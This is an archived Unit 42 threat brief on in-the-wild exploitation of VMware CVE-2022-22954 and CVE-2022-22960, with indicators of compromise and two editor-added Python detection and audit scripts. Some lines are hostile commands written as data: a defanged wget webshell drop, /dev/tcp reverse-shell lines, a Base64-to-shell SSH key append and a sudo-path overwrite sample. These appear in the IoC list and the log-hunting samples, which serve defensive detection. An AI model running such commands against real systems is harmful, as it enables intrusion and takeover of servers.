{
	"id": "338524c1-c672-4b99-a27e-b60bb0d461d8",
	"created_at": "2026-04-06T01:32:29.600993Z",
	"updated_at": "2026-04-10T03:20:24.663626Z",
	"deleted_at": null,
	"sha1_hash": "a39e774f1817e909ace667e74e3fdd2a3e37a720",
	"title": "Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 332897,
	"plain_text": "Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)\r\nBy Ruchna Nigam\r\nPublished: 2022-05-20 · Archived: 2026-04-06 00:20:41 UTC\r\nExecutive Summary\r\nOn April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-\r\n22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and\r\nvRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being\r\nexploited in the wild.\r\nMultiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the\r\nlast week of April, finally followed by a CISA Alert on May 18. The CISA Alert also calls out CVE-2022-22972\r\nand CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be\r\nexploited.\r\nUnit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild. In this blog post, we\r\nshare context around this observed activity, along with how the Palo Alto Networks product suite can be leveraged\r\nto protect against it.\r\nTimeline for VMware Vulnerabilities\r\n2022-04-06:\r\nPublication of VMware advisory VMSA-2022-0011 regarding CVE-2022-22954, CVE-2022-22955,CVE-2022-\r\n22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961.\r\n2022-04-11:\r\nProofs of concept available on GitHub. This is also the earliest date at which Unit 42 observed exploitation\r\nattempts and scanning activity.\r\n2022-04-13:\r\nVMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.\r\n2022-05-18:\r\nPublication of VMware advisory VMSA-2022-0014 regarding CVE-2022-22972, CVE-2022-22973. Publication\r\nof CISA Alert.\r\nAs of this writing, no proofs of concept for exploitation of CVE-22972 or CVE-2022-22973 are known. 
This post\r\nwill be updated with new findings as they are discovered.\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 1 of 7\n\nCVE-2022-22954 in the Wild\r\nCVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware\r\nWorkspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable\r\ndevice.\r\nThe list below details the exploits Unit 42 observed targeting this vulnerability that we deemed worth highlighting.\r\nDirect Downloads\r\nThe injected commands that attempted to download further payloads onto a vulnerable machine fall into the\r\nfollowing broad categories:\r\nMirai/Gafgyt dropper scripts or variants\r\nWebshells\r\nPerl Shellbot\r\nCoinminers\r\nScanning/Callbacks\r\nMirai/Gafgyt Dropper Scripts or Variants\r\nWe observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware. In most\r\ncases the exploit was used only to drop the payload; the payloads themselves did not contain CVE-2022-22954 exploits for further propagation. Instead, they were either non-specific Mirai variants or contained\r\npreviously known exploits such as CVE-2017-17215.\r\nThe exception to this is Enemybot, a currently prevalent botnet built from pieces of both the Gafgyt and Mirai\r\nsource code. The exploits involving Enemybot eventually download Enemybot samples that themselves embed\r\nCVE-2022-22954 exploits for further exploitation and propagation.\r\nWebshells\r\nWe observed the vulnerability exploited to download webshells, including:\r\nA basic implementation that read a GET parameter value, Base64 decoded it, and used a ClassLoader to\r\nload the result (i.e., attacker-supplied Java bytecode).\r\nThe Godzilla Webshell that has also been used in previous campaigns exploiting other vulnerabilities.\r\nPerl Shellbot\r\nCertain injected commands result in the download of obfuscated Perl scripts. 
Deobfuscating these scripts reveals\r\nthey are versions of the known bot family “Stealth Shellbot”, which connects to an IRC server and waits for\r\ncommands. It can also issue HTTP requests on command, so infected machines can be directed to perform further\r\nscanning and exploitation, in addition to executing shell commands received from the command and control (C2)\r\nserver on the target machine.\r\nA complete list of indicators of compromise (IoCs) can be found at the end of this post.\r\nBase64 Injections\r\nFigure 1. An example of Base64 injection observed in the wild.\r\nFigure 2. An example of Base64 injection observed in the wild.\r\nFigure 3. An example of Base64 injection observed in the wild.\r\nThis last command (Figure 3) downloads a shell script that ultimately downloads and executes an XMRig coinminer.\r\nSSH Key Targeting\r\nWe also observed some instances of injected payloads that either tried to read the authorized_keys file on vulnerable\r\nmachines or wrote to it to add an additional key to the machine’s list of accepted keys. Following is\r\nan example of such an attempt.\r\nFigure 4. An example of an injected payload trying to affect authorized keys.\r\nCVE-2022-22960 in the Wild\r\nCVE-2022-22960 is a privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager\r\nand vRealize Automation instances, due to improper permissions in support scripts. 
The vulnerability can be\r\nleveraged to run commands as root on a vulnerable instance.\r\nMore specifically, the flaw exists because the default service user for these VMware products, horizon, is allowed to\r\nrun several commands via sudo, and some of those commands reference file paths that the horizon user can also\r\noverwrite.\r\nAttackers can, therefore, leverage CVE-2022-22954 to remotely execute commands that overwrite those paths. If\r\nsuccessful, CVE-2022-22960 can then be leveraged to execute the overwritten files with root permissions through\r\nsudo.\r\nOur research so far has shown one publicly known sample demonstrating exploitation of CVE-2022-22960 by\r\noverwriting the /usr/local/horizon/scripts/publishCaCert.hzn file.\r\nThe content of this exploit file can be observed below.\r\nFigure 5. An example of an attempt to exploit CVE-2022-22960 observed in the wild.\r\nA second proof-of-concept code sample targets the following two file paths:\r\n/opt/vmware/certproxy/bin/certproxyService.sh\r\n/usr/local/horizon/scripts/diagnostic/getPasswordExpiry.hzn\r\nConclusion\r\nPalo Alto Networks is still actively investigating a number of the aforementioned vulnerabilities, many of which\r\ndo not have publicly available exploit code. 
Presently, customers may leverage the following to block or detect the\r\nthreats communicated throughout this publication:\r\nPalo Alto Networks Next Generation Firewall Threat Prevention blocks CVE-2022-22954 exploits with Signature\r\n92483.\r\nCortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public\r\ninternet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.\r\nWildFire and Cortex XDR categorize all samples of supported file types as malware.\r\nAdditionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering\r\nURL database.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nAs further information or detections are put into place, Palo Alto Networks will update this publication\r\naccordingly.\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their\r\ncustomers and to systematically disrupt malicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nMirai/Gafgyt dropper scripts or variants\r\nhxxp://51[.]81.133.91/FKKK/NW_BBB.x86\r\nhxxp://198[.]46.189.105:80/Ugliest.x86\r\nhxxp://135[.]148.91.146:1980/bins.sh\r\nhxxp://80[.]94.92.38/folder/enemybotarm64/\r\nhxxp://80[.]94.92.38/folder/enemybotx86/\r\nhxxp://80[.]94.92.38/folder/enemybotx64/\r\nPerl Shellbot\r\n193[.]56.28.202/.d/bot.v\r\n193[.]56.28.202/.d/bot.redis\r\n193[.]56.28.202/.d/botVNC\r\nCoinminer activity\r\nhxxp://185[.]157.160.214/xms\r\nhxxp://103[.]64.13.51:8452/cnm\r\nhxxp://113[.]185.0.244/wls-wsat/root\r\nWebshell downloads (full injected command)\r\nwget%20-O%20/opt/vmware/horizon/workspace/webapps/ROOT/error/report1.jsp%20hxxp://103[.]43.18.15:8089/13.jsp\r\nCallback/Scanning activity\r\nhxxps://enlib2w9g8mze[.]x.pipedream.net\r\nDirect Download exploits where payloads were no longer live at the time of analysis:\r\nhxxp://106[.]246.224.219/one\r\n/dev/tcp/101[.]42.89.186/1234\r\nhxxp://192[.]3.1.223/favicon.ico\r\nhxxp://20[.]205.61.88/payllll.sh\r\n45[.]149.77.39:80\r\nhxxps://tmpfiles[.]org/dl/262822/a.txt\r\nhxxps://tmpfiles[.]org/dl/266116/vmware_log.jsp\r\nhxxps://tmpfiles[.]org/dl/262853/vmware_log.jsp\r\nhxxps://tmpfiles[.]org/dl/265385/xmrigdaemon\r\nhxxps://tmpfiles[.]org/dl/265351/shell.py\r\nhxxps://tmpfiles[.]org/dl/265326/cmd.jsp\r\nhxxp://107[.]191.43.86/start\r\nhxxp://107[.]148.13.247/4file\r\nhxxp://107[.]148.13.247/error.txt\r\nhxxp://107[.]148.13.247:7777/file\r\nhxxp://107[.]148.12.162:12345/log\r\nhxxp://45[.]144.179.204:9999/log\r\n/dev/tcp/193[.]56.28.202/443\r\n/dev/tcp/193[.]56.28.202/444\r\nhxxps://129[.]226.227.246/help.txt\r\nhxxps://20[.]232.97.189/up/4102909932.sh\r\nhxxps://20[.]232.97.189/up/d1bea27b13.sh\r\nhxxps://20[.]232.97.189/up/388e6567d5.sh\r\nhxxp://138[.]68.61.82:444\r\nSample 
hashes\r\n801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637\r\n6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b\r\n940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8\r\nfdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05\r\n85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03\r\nbot.v\r\n0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba\r\nC2 server: 5[.]39.217.212:80\r\nChannel: #vcenter getsome\r\nbot.redis\r\n48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b\r\nC2 server: 64[.]32.6.143:80\r\nChannel: #redis getsome\r\nbotVNC\r\nc399b56e1baf063ca2c8aadbbe4a2b58141916aac8ef790a9c29762ed1956bd5\r\nC2 server: 5[.]39.217.212:80\r\nChannel: #D getsome\r\n7e29615126585b9f87ded09cfae4724bb5d7896c7daf2adfcef775924549e49b\r\n099ac2f3e10346dbef472b2a7b443ebfe1f6011a9a2518a54c20aad07fe9ec61\r\nUpdated May 23, 2022, at 1 p.m. PT.\r\nSource: https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/"
	],
	"report_names": [
		"cve-2022-22954-vmware-vulnerabilities"
	],
	"threat_actors": [],
	"ts_created_at": 1775439149,
	"ts_updated_at": 1775791224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a39e774f1817e909ace667e74e3fdd2a3e37a720.pdf",
		"text": "https://archive.orkl.eu/a39e774f1817e909ace667e74e3fdd2a3e37a720.txt",
		"img": "https://archive.orkl.eu/a39e774f1817e909ace667e74e3fdd2a3e37a720.jpg"
	}
}
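Added example for the "CVE-2022-22954 in the Wild" section of the record above. This is editor-added code, not code from the Unit 42 post or from Palo Alto Networks: a small log hunt that URL-decodes request targets, unwraps Base64 blobs the way the Base64 injections in the post hide their commands, and flags the post-exploitation patterns the post reports (a JSP dropped into the ROOT webapp, authorized_keys tampering, /dev/tcp reverse shells, Base64-to-shell pipelines, and writes to the three sudo-reachable paths named under CVE-2022-22960). The log format, the /example/endpoint path, the cmd parameter name and every sample line are constructed for the example; only the wget command in the first sample is copied, still defanged (hxxp), from the post's IoC list. The real vulnerable endpoint and parameter are not given in the post and are not assumed here.

```python
# Editor-added example; not code from the Unit 42 post.
# Hunts request logs for the injected-command patterns the post describes.
import base64
from urllib.parse import quote, unquote

# Substrings characteristic of the activity the post reports. The three
# .hzn/.sh paths are the CVE-2022-22960 sudo targets named in the post.
INDICATORS = {
    'jsp_drop': ['/opt/vmware/horizon/workspace/webapps/ROOT/'],
    'authorized_keys': ['authorized_keys'],
    'reverse_shell': ['/dev/tcp/'],
    'base64_exec': ['base64 -d', 'base64 --decode'],
    'sudo_path_overwrite': [
        '/usr/local/horizon/scripts/publishCaCert.hzn',
        '/opt/vmware/certproxy/bin/certproxyService.sh',
        '/usr/local/horizon/scripts/diagnostic/getPasswordExpiry.hzn',
    ],
}
B64_CHARS = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=')


def base64_blobs(text, min_len=16):
    """Decode every run of Base64 characters in text that decodes cleanly.

    Base64-wrapped commands (echo <blob> | base64 -d | sh) hide their real
    intent from naive substring filters; inspecting the decoded text closes
    that gap. Runs that fail strict validation are skipped.
    """
    decoded, run = [], ''
    for ch in text + ' ':          # trailing space flushes the last run
        if ch in B64_CHARS:
            run += ch
            continue
        if len(run) >= min_len:
            try:
                raw = base64.b64decode(run, validate=True)
                decoded.append(raw.decode('utf-8', 'replace'))
            except ValueError:     # binascii.Error is a ValueError subclass
                pass
        run = ''
    return decoded


def classify(decoded_target):
    """Return the sorted indicator names found in a decoded request target."""
    hits = set()
    for text in [decoded_target] + base64_blobs(decoded_target):
        for name, needles in INDICATORS.items():
            if any(needle in text for needle in needles):
                hits.add(name)
    if 'wget ' in decoded_target or 'curl ' in decoded_target:
        hits.add('download_cradle')
    return sorted(hits)


def hunt(lines):
    """Constructed log format: '<timestamp> <client> <method> <target>'.

    The target is URL-decoded twice because injected commands arrive
    URL-encoded and some tooling double-encodes them.
    """
    results = []
    for line in lines:
        _ts, client, _method, target = line.split(' ', 3)
        hits = classify(unquote(unquote(target)))
        if hits:
            results.append((client, hits))
    return results


# ---- constructed sample log (placeholder endpoint and parameter name) ----
KEY_APPEND_CMD = 'echo ssh-rsa AAAAB3NzaC1yc2E example >> ~/.ssh/authorized_keys'
KEY_APPEND_B64 = base64.b64encode(KEY_APPEND_CMD.encode()).decode()

SAMPLE_LOG = [
    # injected command copied (defanged) from the post's IoC list
    '2022-04-11T09:12:03Z 198.51.100.7 GET /example/endpoint?cmd='
    'wget%20-O%20/opt/vmware/horizon/workspace/webapps/ROOT/error/report1.jsp'
    '%20hxxp://103[.]43.18.15:8089/13.jsp',
    '2022-04-11T09:14:40Z 198.51.100.8 GET /example/endpoint?cmd='
    + quote('echo ' + KEY_APPEND_B64 + ' | base64 -d | sh', safe=''),
    '2022-04-11T09:15:02Z 198.51.100.9 GET /example/endpoint?cmd='
    + quote('bash -i >& /dev/tcp/101[.]42.89.186/1234 0>&1', safe=''),
    '2022-04-11T09:16:30Z 198.51.100.10 GET /example/endpoint?cmd='
    + quote('echo id > /usr/local/horizon/scripts/publishCaCert.hzn', safe=''),
    '2022-04-11T09:20:00Z 192.0.2.44 GET /example/endpoint?page=1&lang=en',
]

if __name__ == '__main__':
    for client, hits in hunt(SAMPLE_LOG):
        print(client, ', '.join(hits))
```

The substring list is deliberately narrow (paths and commands the post itself reports) so it can be dropped into a SIEM rule without tuning; the Base64 unwrapping is what turns the "Base64 Injections" figures in the post into something a rule can actually match.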
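Added example for the "CVE-2022-22960 in the Wild" section of the record above (editor-added code, not from the Unit 42 post): an audit of the three sudo-reachable script paths the post names, flagging each one that a non-root service account could overwrite directly, or replace by writing to its parent directory. It runs against a constructed, throw-away directory tree rather than a live appliance; the service account's uid and gid are an assumed value chosen to differ from the fixture's file owner, standing in for the horizon user. The actual sudoers entries are not listed in the post and are not modelled.

```python
# Editor-added example; not code from the Unit 42 post.
# Audits the CVE-2022-22960 sudo target paths for writability by a non-root
# service account (horizon on a real appliance).
import os
import shutil
import stat
import tempfile

# The three sudo-invoked paths named in the post.
SUDO_TARGETS = [
    '/usr/local/horizon/scripts/publishCaCert.hzn',
    '/opt/vmware/certproxy/bin/certproxyService.sh',
    '/usr/local/horizon/scripts/diagnostic/getPasswordExpiry.hzn',
]


def writable_by(st, uid, gid):
    """Could a non-root process with this uid/gid write the object st describes?"""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit(root, uid, gid, targets=SUDO_TARGETS):
    """Map each target path to 'ok', 'missing', or a comma-joined list of weaknesses.

    root is prepended so the same logic can run on a fixture tree; pass '/'
    on a live host. A root-owned 0644 script is still replaceable if its
    parent directory is writable (unlink + recreate) unless the sticky bit
    restricts deletion, so the parent directory is checked as well.
    """
    findings = {}
    for target in targets:
        path = os.path.join(root, target.lstrip('/'))
        if not os.path.lexists(path):
            findings[target] = 'missing'
            continue
        st = os.lstat(path)
        reasons = []
        if stat.S_ISLNK(st.st_mode):
            reasons.append('symlink')       # link could be re-pointed
        if writable_by(st, uid, gid):
            reasons.append('file-writable')
        parent = os.lstat(os.path.dirname(path))
        if writable_by(parent, uid, gid) and not parent.st_mode & stat.S_ISVTX:
            reasons.append('parent-dir-writable')
        findings[target] = ','.join(reasons) or 'ok'
    return findings


def build_fixture():
    """Constructed tree: one world-writable script, one in a world-writable
    directory, one locked down. Returns the temporary root."""
    root = tempfile.mkdtemp(prefix='vmw-audit-')
    modes = {   # (file mode, parent directory mode)
        SUDO_TARGETS[0]: (0o666, 0o755),
        SUDO_TARGETS[1]: (0o555, 0o777),
        SUDO_TARGETS[2]: (0o555, 0o755),
    }
    for target, (fmode, dmode) in modes.items():
        path = os.path.join(root, target.lstrip('/'))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w') as fh:
            fh.write('#!/bin/sh\necho placeholder\n')
        os.chmod(path, fmode)
        os.chmod(os.path.dirname(path), dmode)  # explicit chmod so umask does not interfere
    return root


def run_demo():
    """Audit the fixture as an assumed service uid/gid that is not the file owner."""
    root = build_fixture()
    try:
        fake_uid = os.getuid() + 1   # any uid other than the owner stands in for horizon
        return audit(root, fake_uid, fake_uid)
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for target, verdict in run_demo().items():
        print(verdict.ljust(22), target)
```

On a live appliance the call is audit('/', pwd.getpwnam('horizon').pw_uid, pwd.getpwnam('horizon').pw_gid); pair it with sudo -l -U horizon to confirm which of these scripts sudo actually permits, since the post names the paths but not the sudoers rules. Any 'file-writable' or 'parent-dir-writable' verdict is exactly the precondition the post describes: a CVE-2022-22954 foothold as horizon overwrites the file, and the sudo rule then runs the attacker's content as root.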